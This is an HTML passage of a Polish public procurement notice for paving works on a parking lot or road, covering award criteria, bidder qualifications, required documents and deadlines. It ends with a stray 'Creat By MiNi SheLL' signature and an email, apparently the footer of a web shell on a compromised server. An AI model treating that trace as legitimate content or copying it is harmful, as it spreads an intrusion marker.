class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszelkie informacje znajdują się w rozdziale XV SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu, dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym;<br/> Zamawiający nie określa warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/> Zamawiający nie określa warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej i finansowej t.j.: posiadają środki finansowe lub zdolność kredytową <br/>w wysokości co najmniej:<br/>a) na część nr 1: 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych), co potwierdzą poprzez złożenie aktualnej informacji banku;<br/>b) na część nr 2: 100 000,00 zł (słownie: sto tysięcy złotych), co potwierdzą poprzez złożenie aktualnej informacji banku;<br/>UWAGA: WYKONAWCA SŁADAJĄC OFERTĘ NA DWIE CZĘŚCI ZAMÓWIENIA MUSI WYKAZAĆ SPEŁNIENIE WARUNKU POPRZEZ POSIADANIE ŚRODKÓW FINANSOWYCH LUB ZDOLNOŚCI KREDYTOWEJ W WYSOKOŚCI CO NAJMNIJE 200.000 ZŁ (DWIEŚCIE TYSIĘCY ZŁOTYCH)<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonego oświadczenia wg załącznika Nr 2 oraz informacji banku złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA<br/>3) zdolności technicznej lub zawodowej w zakresie : tj.:<br/>a)	Doświadczenia: <br/>posiadają doświadczenie umożliwiające realizację zamówienia tzn. wykonali należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną robotę budowlaną polegającą na budowie lub przebudowie parkingu lub nawierzchni drogi o nawierzchni Z KOSTKI BETONOWEJ, o wartości robót minimum 150. 000,00 zł brutto (słownie: sto pięćdziesiąt tysięcy złotych 00/00), co potwierdzą w wykazie wykonanych robót oraz referencjami;<br/>WYKONAWCA SKŁADAJĄC OFERTĘ NA DWIE CZĘŚCI ZAMÓWIENIA MUSI WYKAZAĆ SPEŁNIENIE WARUNKU JAK DLA JEDNEJ CZĘŚCI ZAMÓWIENIA<br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie złożonego oświadczenia wg załącznika Nr 2 oraz dokumentów złożonych przez wykonawcę potwierdzających należyte wykonanie robót - na zasadzie SPEŁNIA/NIESPEŁNIA.<br/><br/>	b) Dysponują osobami zdolnymi do wykonania zamówienia :<br/>-Kierownik budowy- (1 osoba) posiadająca uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tej specjalności, <br/>co potwierdzą poprzez złożenie oświadczenia i w wykazie osób zdolnych do realizacji zamówienia (wg załącznika Nr 5). <br/>WYKONAWCA SKŁADAJĄC OFERTĘ NA DWIE CZĘŚCI ZAMÓWIENIA MUSI WYKAZAĆ SPEŁNIENIE WARUNKU JAK DLA JEDNEJ CZĘŚCI ZAMÓWIENIA<br/>Wymaga się kierownika budowy dla każdej części przedmiotu zamówienia.<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie wykazu osób zdolnych do wykonania zamówienia złożonego przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia przez wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia :<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/>2) oświadczenia własnego wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 3 ustawy, <br/>b)	art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>c)	art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>d)	art. 108 ust. 1 pkt 6 ustawy,<br/>e)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 1497 z późn. zm).<br/>3)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej <br/>(wg załącznika nr 7),<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych środków dowodowych, o których mowa w ppkt. 1 – 2) dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/>1)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane lub usługi zostały wykonane należycie, przy czym dowodami, o których mowa,<br/> są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane lub usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/> ( wg załącznika Nr 4 ),<br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami ( wg załącznika Nr 5 ),<br/>3)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, <br/>w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia :<br/>1) wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia <br/>z postępowania na podstawie art. 108 ust. 1 oraz oraz art. 109 ust. 1 pkt. 4, ustawy Pzp, oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 1497 z późn. zm)<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>4) muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>5) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców,<br/>6)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego będzie wynikać, jakie roboty budowlane wykonają poszczególni wykonawcy,<br/>7)	przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie informacje znajdują się w rozdziale XIX SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-13 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem Platformy na adres : https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-13 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-12</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com